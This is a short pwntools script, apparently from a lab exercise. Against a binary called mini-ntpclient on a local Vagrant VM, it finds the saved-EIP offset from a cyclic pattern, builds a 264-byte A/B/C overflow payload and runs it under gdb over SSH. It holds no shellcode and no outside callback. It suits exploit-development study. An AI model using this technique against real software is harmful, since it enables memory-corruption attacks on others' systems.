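from pwn import *

import base64

context.update(arch='i386', os='linux')

# Connection details for the test VM: Vagrant's default box user, the
# default host alias and the forwarded SSH port. Kept as named constants so
# the script can be pointed elsewhere without editing the call sites below.
SSH_USER = 'vagrant'
SSH_HOST = 'default'
SSH_PORT = 2222
TARGET_BINARY = b'/vagrant/mini-ntpclient'

# Total input length at which the target crashes.
# NOTE(review): an earlier, commented-out value was 0x12c (300); 264 is the
# value actually used here -- confirm against the observed crash length.
crash_at = 264

# Value found in EIP at the crash. It is a fragment of a pwntools cyclic
# pattern, so cyclic_find maps it back to its offset inside the pattern.
eip_crash = 0x61616663
eip_crash_buffer = cyclic_find(eip_crash)

# Fail loudly instead of silently building a nonsense payload: cyclic_find
# reports a value that is not part of the pattern as -1, and an offset that
# does not fit inside crash_at would give the 'C' padding a negative length
# (which Python turns into an empty string without complaint).
if eip_crash_buffer < 0:
    raise ValueError('EIP value 0x%x is not part of the cyclic pattern' % eip_crash)
if eip_crash_buffer + 4 > crash_at:
    raise ValueError('EIP offset %d (+4) does not fit in crash length %d'
                     % (eip_crash_buffer, crash_at))

# Test payload: A's up to the saved EIP, B's over the EIP, then C's to pad
# the input out to crash_at. Built from bytes literals so it is valid input
# to sendline() under both Python 2 (where bytes is str) and Python 3
# pwntools; the original str payload only worked on Python 2.
payload = b'A' * eip_crash_buffer + b'B' * 4 + b'C' * (crash_at - eip_crash_buffer - 4)

# Connect to the server with SSH. The connection is opened only after the
# payload has been validated so a bad offset does not leave it dangling.
ssh_connection = ssh(SSH_USER, SSH_HOST, port=SSH_PORT)
try:
    # Open a shell to write more stuff to
    bash = ssh_connection.run('bash')

    # Run the target under gdb with the payload as its first argument
    bash.sendline(b'gdb ' + TARGET_BINARY)
    bash.sendline(b'run ' + payload)

    # Hand an interactive shell back to the user
    bash.interactive()
finally:
    # Always release the SSH session, even if the interactive shell is
    # interrupted or one of the sendline() calls fails.
    ssh_connection.close()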